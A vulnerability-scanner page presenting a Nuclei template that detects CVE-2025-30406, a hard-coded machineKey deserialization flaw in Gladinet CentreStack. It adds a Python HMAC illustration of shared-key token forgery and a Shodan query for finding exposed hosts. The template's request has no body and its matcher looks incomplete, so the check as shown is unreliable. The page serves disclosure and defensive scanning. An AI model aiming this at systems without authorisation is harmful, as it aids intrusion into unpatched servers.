Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
ID: CVE-2025-30406
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2025,gladinet,rce,centrestack,deserialization
Description
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal’s hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution.
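To make the description's point concrete, the following is an added illustration (not part of the template and not Gladinet's code) using a simplified HMAC model of ViewState MAC validation; the key values and state bytes are constructed placeholders, and the framing is not the real ASP.NET ViewState format. It shows that a token signed under a machineKey every install shares validates on every install, and stops validating once each install has its own random key.

```python
import base64
import hashlib
import hmac
import os
from typing import Dict, Optional

# Simplified model (assumption): token = base64(state || HMAC-SHA256(machine_key, state)).
# Real ASP.NET framing differs; only the key-sharing property matters here.
MAC_LEN = 32

def sign_viewstate(machine_key: bytes, state: bytes) -> str:
    """Return a MAC-protected token for the given serialized state bytes."""
    mac = hmac.new(machine_key, state, hashlib.sha256).digest()
    return base64.b64encode(state + mac).decode()

def verify_viewstate(machine_key: bytes, token: str) -> Optional[bytes]:
    """Return the state bytes if the MAC verifies under machine_key, else None."""
    raw = base64.b64decode(token)
    if len(raw) < MAC_LEN:
        return None
    state, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(machine_key, state, hashlib.sha256).digest()
    # Constant-time compare: only a token MAC'd under this install's key is accepted.
    if not hmac.compare_digest(mac, expected):
        return None
    return state

# Constructed placeholder standing in for a key baked into every installation.
SHARED_KEY = b"constructed-placeholder-key-shared-by-every-install"

def accepted_by_installs(token: str, install_keys: Dict[str, bytes]) -> Dict[str, bool]:
    """For each install (name -> its machineKey), report whether it accepts the token."""
    return {name: verify_viewstate(key, token) is not None for name, key in install_keys.items()}

def demo():
    # Constructed sample: a token produced by someone who knows the shared key.
    # The state is opaque placeholder bytes, not a deserialization gadget chain.
    foreign_token = sign_viewstate(SHARED_KEY, b"<opaque serialized state>")
    # Before key rotation every install shares SHARED_KEY, so all accept the token.
    before = accepted_by_installs(foreign_token, {"install-a": SHARED_KEY, "install-b": SHARED_KEY})
    # After rotation each install holds its own random key; the token fails everywhere.
    after = accepted_by_installs(foreign_token, {"install-a": os.urandom(64), "install-b": os.urandom(64)})
    return before, after

if __name__ == "__main__":
    print(demo())
```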
YAML Source
id: CVE-2025-30406
info:
  name: Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-30406
    - https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf
    - https://www.centrestack.com/p/gce_latest_release.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-30406
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:1163764264
  tags: cve,cve2025,gladinet,rce,centrestack,deserialization
http:
  - raw:
      - |
        POST /portal/loginpage.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - 'contains(to_lower(projectdiscovery), "cve-2025-30406")'
          - 'status_code == 302'
        condition: and
# digest: 490a004630440220606715b92c36f6e4e0c36b4d18fabe25f1f9d4ba2ff3e7a564e1d8d86fd554e4022016bd25681f4b39876e8045295a0c2c6ce805445a2cc23e368e75d2ed3ed3abe3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability described above in a target web application. Run it with the Nuclei tool against the target URL to check for the vulnerable request pattern and response behavior:
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-30406.yaml"